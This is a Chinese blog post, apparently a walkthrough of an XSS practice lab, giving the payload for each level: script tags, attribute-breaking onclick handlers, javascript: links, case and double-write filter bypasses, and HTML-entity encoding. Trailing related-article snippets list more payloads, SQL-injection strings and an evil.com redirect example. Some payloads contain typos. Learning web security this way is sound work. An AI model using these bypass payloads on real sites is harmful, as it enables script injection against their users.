xss攻击(一)

最新推荐文章于 2025-06-16 18:52:44 发布
原创 最新推荐文章于 2025-06-16 18:52:44 发布 · 400 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

xss攻击

前言: xss也是web安全中的一种常见的攻击方式,想要学习,就先要了解是什么。
xss攻击的定义:

XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets,
CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。

只是看概念是没意思的,要想真正的了解就要通过练习题目才能更加具体的感受。

level1

在这里插入图片描述
第一题非常简单就用,最普通的注入语句就可以了

<script>alert(/hacker)</scrip>

level 2

输入了简单的注入语句后,查看源代码
在这里插入图片描述
要想语句起作用,就要把input给闭合掉,可输入

"><script>alert(/hacker/)</script>

level3

输入简单注入语句后查看源代码

<input name=keyword  value='&lt;script&gt;alert(/hacker/)&lt;/script&gt;'>

可以看出<>被转义
就可以用另一种攻击方式,用onclick 事件,onclick 事件会在元素被点击时发生。onclick 事件直接包含在<>内,并且可以被执行。再观察页面源代码,是单引号,那就在前面加’把value给闭合掉。
payload

'onclick='javascript:alert(/hacker/>'

level 4


输入简单的注入语句后查看源代码

<input name=keyword  value="scriptalert(/hacker/)/script">
<input type=submit name=submit value=搜索 />

观察到<和>直接被过滤掉了
那就用onclick 事件,这里是双引号,那就在前面输入",把value给闭合掉。
payload

"onclick="javascript:alert(/hacker/)"

level 5

输入onclick注入语句后查看源代码
在这里插入图片描述
发现on中多了一个下划线,所以过滤了onclick事件,试试script,再看页面源代码,发现script也被过滤掉了。
那就用<a>标签构造攻击语句试试。
payload

"><a href="javascript:alert(/xss/)">hacker</a>

也可以再后面加上//注释掉后面的"/,以免对前面的语句产生影响

level 6

输入onclick语句查看源代码发现被过滤,

在这里插入图片描述再输入<a>标签语句查看源代码发现也被过滤了
在这里插入图片描述
这里过滤的是onclick,看到说可以改为大写试一下
payload

"ONCLICK="javascript:alert(/hacker/)"

看到有大佬还能用这样的语句

"><svg x="" Onclick=alert(1)>

level 7

输入scrip语句后查看源代码
在这里插入图片描述
可以看出<和>被过滤掉了,连关键字也被过滤掉了
可以用双写绕过

“<sscriptcript>alert(/hacker/)</sscriptcript>

这样是让其过滤掉中的script,但是一旦过滤掉,前后又可以重新拼接起来,形成一个完整的语句。

level8

输入了script语句查看源代码
在这里插入图片描述可以看出script被过滤掉了,在这里应当用<a>标签语句,仔细看它也是有友情提示的,这里已经有<a>标签,那么只用输出

javascript:alert(/hacker/)

在这里插入图片描述
查看源代码后发现script被过滤,换一种方式表达script
可以采用HTML字符实体转换
在这里插入图片描述
payload

java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(/hacker/)

方法二:用 html 的自解码机制就可以绕过(我倒是不会)

javasc&#114;ipt:alert(0)

level9

输入注入语句

javascript:alert(/hacker/)

查看源代码
在这里插入图片描述
输入的语句并没有进入到 <a>标签中,这里应该对格式有一定要求,在这里也有提示,要在后面输入http://否则不合法。
payload

java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(/hacker/)//http://

level0

在这里插入图片描述
这道题连输入都没有,查看源代码

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
</form>

可以先找到注入口
在这里插入图片描述
在查看源代码
在这里插入图片描述
可以看到t_sort就是注入口了
在这里插入图片描述
就可以了!
继续加油,未完待续!

wwwwxiaobai
关注
xss常用攻击语法
weixin_47156475的博客
08-11 3076
常用: <script>alert(1)</script> <img src=x onerror=alert(1)> <svg onload=alert(1)> <a href=javascript:alert(1)> <script>alter('dreeee')</script>; 用于探测的万能语句: <SCRscriptIPT>'"()Oonnjavascript 标签溢出: "> &lt
xss攻击语句大全。。
04-16
网站安全测试。。xss漏洞。。免去你输入的麻烦。可以直接复制粘贴。。
XSS攻击
ailunlee的博客
07-30 620
XSS攻击 1 XSS简介 XSS跨站脚本攻击(Cross Site Scripting),就是攻击者在web页面插入恶意的script代码,当用户浏览该页面之时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的特殊目的。 2 XSS的类型 2.1 反射型XSS 反射型XSS只是简单的把用户输入的数据“反射”给浏览器。也就是说需要诱使用户“...
【2025版】最新前端必知的跨站脚本攻击XSS)示例与解决方案(非常详细),从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
06-16 1320
O了,看破就是要说破,我是V哥,个永远18的程序员,喜欢广交天下志同道合的朋友,喜欢分享技术经验,讲真,这会促进我的荷尔蒙分泌,所以会直坚持下去,欢迎关注威哥爱编程,技术路上我们起成长。黑客/网络安全学习路线对于从来没有接触过黑客/网络安全的同学,目前网络安全、信息安全也是计算机大学生毕业薪资相对较高的学科。大白也帮大家准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
XSS 攻击
wuli1024的博客
01-03 3074
Cross-Site Scripting(跨站脚本攻击)简称 XSS,是代码注入攻击攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
04-07
PDF-XSS实例文件
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
总之,PDF文件的XSS攻击种非典型的XSS形式,但同样需要重视。通过在SpringBoot应用中配置XSSFilter并结合其他安全措施,可以有效防止此类攻击,保护用户的浏览器环境不受侵害。同时,定期更新安全知识,对新的...
XSS攻击常识及常见的XSS攻击脚本汇总.pdf
12-26
XSS攻击常识及常见的XSS攻击脚本汇总
预防XSS攻击和SQL注入XssFilter
05-19
、什么是XSS攻击 XSS种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路访问控制——例如...
8、XSS 攻击的防御pdf资料
10-15
XSS(跨站脚本攻击)是网络安全领域中种...总之,XSS攻击种严重的威胁,需要开发者在设计和开发阶段就充分考虑安全性,通过合理的输入验证、数据转义和使用安全策略来降低攻击风险,保护用户的隐私和数据安全。
XSS测试语句大全
08-07
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
我眼中的XSS攻击测试语句
ovowovo的博客
12-02 399
=‘> %3Cscript%3Ealert(XSS)%3C/script%3E %0a%0a link admin‘-- ‘ or 0=0 -- " or 0=0 -- or 0=0 -- ‘ or 0=0 # " or 0=0 # or 0=0 # ‘ or ‘x‘=‘x " or "x"="x ‘) or (‘x‘=‘x ‘ or 1=1-- " or 1=1-- or...
XSS攻击方法
blrk
05-11 1264
首先通过构造XSS代码的方法来构造XSS脚本,用以测试发现漏洞,然后利用以下方法实现攻击。 (1)Redirection - 重定向 重定向被攻击者,如document.location=http://www.evil.com (2)Clickjacking - 点击劫持 可用来钓鱼,如通过onclick触发 (3)URL Spoofing - URL欺骗 常用于钓鱼,页面被劫持并且信
常见的XSS攻击语句构造
PassWarer
09-27 3685
1.利用标记注射HTML/Javascript 2.利用HTML标签属性执行xss a)Background=”javascript:alert(/xss/)” b)Src=”javascript:alert(/xss/)” c)Href d)Lowsrc e)Bgsound f)Value g)Action h)Dynsrc i)... 部分浏览器不适用。而且 不是所有的属
简学-XSS 攻击
码农米格的博客
03-10 216
XSS 攻击0x00 XSS 的相关概念0x00.1 XSS 的分类反射型 XSS:存储型 XSSDOM型XSS0x01 XSS 基本payloadXSS 常见攻击手段 针对 XSS 攻击的学习与笔记。推荐个免费的练习靶场: 0x00 XSS 的相关概念 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时
浅谈XSS攻击的那些事(附常用绕过姿势)
qq_42801460的博客
03-29 1692
有的时候,服务器往往会对代码中的关键字(如alert)进行过滤,这个时候我们可以尝试将关键字进行编码后再插入,不过直接显示编码是不能被浏览器执行的,我们可以用另个语句eval()来实现。由于盗取的cookie需要传回给攻击者,因此往往需要个服务器来接收盗取的cookie,这也就是xss平台的作用了。也就是攻击相对于访问者而言是次性的,具体表现在我们把我们的恶意脚本通过url的方式传递给了服务器,而服务器则只是不加处理的把脚本“反射”回访问者的浏览器而使访问者的浏览器执行相应的脚本。
Java组件xssProtect防范XSS攻击
这些组件通常提供了系列的API或注解,以便开发者在Web应用中轻松实现对XSS攻击的防护。 #### 2. 常见的Java XSS防护开源组件 - OWASP Java HTML Sanitizer:OWASP提供的个用于清理不受信任HTML内容的库。 - ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值